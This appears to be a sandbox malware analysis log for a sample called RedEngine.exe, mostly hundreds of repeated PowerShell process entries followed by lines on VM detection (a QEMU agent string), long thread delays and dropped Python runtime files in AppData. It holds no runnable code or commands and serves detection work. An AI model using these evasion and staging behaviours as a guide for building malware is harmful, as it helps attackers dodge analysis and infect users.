                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe Process information set: NOOPENFILEERRORBOX (8 occurrences)
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
                        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (235 occurrences)

                        Malware Analysis System Evasion

                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002958000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\
Source: C:\Users\user\Desktop\RedEngine.exe | Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RedEngine.exe | Memory allocated: 1A8C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Memory allocated: A50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Memory allocated: 2470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Memory allocated: B00000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RedEngine.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6127
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3644
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5632
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4081
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Window / User API: threadDelayed 6141
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Window / User API: threadDelayed 3853
Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2779
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1753
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\pyarmor_runtime_000000\pyarmor_runtime.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\pyarmor_runtime_000000\pyarmor_runtime.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_lzma.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_hashlib.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_ssl.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\python312.dll
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\select.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_bz2.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_socket.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_tkinter.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_ssl.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\unicodedata.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_hashlib.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_decimal.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\unicodedata.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_socket.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\unicodedata.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_bz2.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\python312.dll
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\python312.dll
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_lzma.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_bz2.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_ctypes.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\pyarmor_runtime_000000\pyarmor_runtime.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_tkinter.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\select.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_tkinter.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_socket.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_hashlib.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_ctypes.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_decimal.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_ctypes.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_lzma.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_ssl.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_decimal.pyd
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\select.pyd
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Check user administrative privileges: GetTokenInformation
